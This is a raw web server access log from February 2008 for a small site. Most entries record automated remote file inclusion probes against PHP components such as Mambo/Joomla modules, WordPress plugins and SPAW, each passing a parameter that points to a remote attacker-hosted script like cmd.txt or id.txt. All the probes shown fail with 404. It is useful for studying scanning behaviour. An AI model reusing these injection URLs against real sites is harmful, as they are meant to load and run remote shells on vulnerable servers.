213.203.199.52 - - [17/Feb/2008:10:51:44 -0800] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
195.177.193.178 - - [17/Feb/2008:10:51:45 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.177.193.178 - - [17/Feb/2008:10:51:45 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.177.193.178 - - [17/Feb/2008:10:51:45 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.71.230 - - [17/Feb/2008:10:51:49 -0800] "GET /logs/access_080117.log/test.php?page=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.71.230 - - [17/Feb/2008:10:51:49 -0800] "GET /logs/test.php?page=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:10:52:08 -0800] "GET /index3.php?webcalendarhttp://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:10:52:08 -0800] "GET /logs/index3.php?webcalendarhttp://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
217.114.97.99 - - [17/Feb/2008:10:52:26 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.114.97.99 - - [17/Feb/2008:10:52:26 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.114.97.99 - - [17/Feb/2008:10:52:26 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:52:36 -0800] "GET /logs/access_071225.log/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:52:36 -0800] "GET /com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:52:36 -0800] "GET /logs/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.53.84.2 - - [17/Feb/2008:10:53:47 -0800] "GET /logs/access_071230.log//account.php?action=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [17/Feb/2008:10:53:47 -0800] "GET //account.php?action=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [17/Feb/2008:10:53:47 -0800] "GET /logs//account.php?action=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [17/Feb/2008:10:54:42 -0800] "GET /logs/access_071222.log//account.php?action=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:54:43 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:56:26 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:10:56:29 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:10:56:30 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:10:56:30 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [17/Feb/2008:10:57:16 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [17/Feb/2008:10:57:16 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [17/Feb/2008:10:57:17 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:57:42 -0800] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:57:42 -0800] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.246.41.127 - - [17/Feb/2008:10:57:52 -0800] "GET /logs/access_071225.log/admin.php?include_path=http://hornydate.co.uk/sys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [17/Feb/2008:10:57:53 -0800] "GET /admin.php?include_path=http://hornydate.co.uk/sys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [17/Feb/2008:10:57:53 -0800] "GET /logs/admin.php?include_path=http://hornydate.co.uk/sys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:59:13 -0800] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:59:13 -0800] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:10:59:16 -0800] "GET /menu.php?baseDir=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:10:59:17 -0800] "GET /logs/menu.php?baseDir=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:11:00:25 -0800] "GET /menu.php?webcalendarhttp://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:11:00:25 -0800] "GET /logs/menu.php?webcalendarhttp://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
212.83.255.82 - - [17/Feb/2008:11:01:10 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.83.255.82 - - [17/Feb/2008:11:01:10 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.83.255.82 - - [17/Feb/2008:11:01:10 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:11:03:00 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:11:03:00 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
64.191.28.10 - - [17/Feb/2008:11:03:59 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
64.191.28.10 - - [17/Feb/2008:11:03:59 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.20.144 - - [17/Feb/2008:11:04:50 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:11:06:08 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:11:06:08 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
212.134.155.211 - - [17/Feb/2008:11:06:32 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.134.155.210 - - [17/Feb/2008:11:06:36 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.134.155.210 - - [17/Feb/2008:11:06:37 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:11:07:46 -0800] "GET /logs/access_080126.log/modules/My_eGallery/index.php?basepath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:11:07:46 -0800] "GET /modules/My_eGallery/index.php?basepath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:11:07:46 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:07:58 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [17/Feb/2008:11:08:02 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.67.238.88 - - [17/Feb/2008:11:08:17 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [17/Feb/2008:11:08:17 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [17/Feb/2008:11:08:17 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:11:09:30 -0800] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:11:09:32 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:11:09:41 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.67.238.88 - - [17/Feb/2008:11:09:54 -0800] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.16.61 - - [17/Feb/2008:11:10:57 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [17/Feb/2008:11:10:57 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:11:11:05 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:11:11:06 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:11:11:21 -0800] "GET /logs/access_080122.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:11:11:28 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:11:11:28 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:11:11:29 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:11:11:29 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:11:11:29 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:11:11:30 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:11:11:34 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:11:11:35 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:11:11:35 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.152.143.228 - - [17/Feb/2008:11:12:34 -0800] "GET /logs/access_080101.log HTTP/1.1" 200 216727 "http://www.google.fr/search?q=inurl:+modifyform.html%3Fcode%3D&hl=fr&start=90&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
201.225.251.165 - - [17/Feb/2008:11:13:01 -0800] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cosmic.lydo.org/doc/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.225.251.165 - - [17/Feb/2008:11:13:01 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cosmic.lydo.org/doc/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.225.251.165 - - [17/Feb/2008:11:13:02 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cosmic.lydo.org/doc/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:11:13:39 -0800] "GET /logs/access_080131.log/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:11:13:39 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:11:13:39 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:11:13:42 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:11:13:43 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
81.177.16.61 - - [17/Feb/2008:11:14:01 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.225.251.165 - - [17/Feb/2008:11:14:06 -0800] "GET /logs/access_080122.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cosmic.lydo.org/doc/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:11:15:00 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:11:15:00 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:11:15:07 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:11:15:07 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:11:15:07 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:11:15:38 -0800] "GET /logs/access_071225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:11:15:39 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:11:15:39 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:11:15:54 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:16:15 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:16:16 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:16:17 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:11:16:57 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:11:17:03 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:11:17:40 -0800] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:11:17:40 -0800] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:11:18:32 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:11:19:05 -0800] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:11:19:05 -0800] "GET //modules/xfsection/modify.php?dir_module=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:11:19:06 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:19:12 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:19:13 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
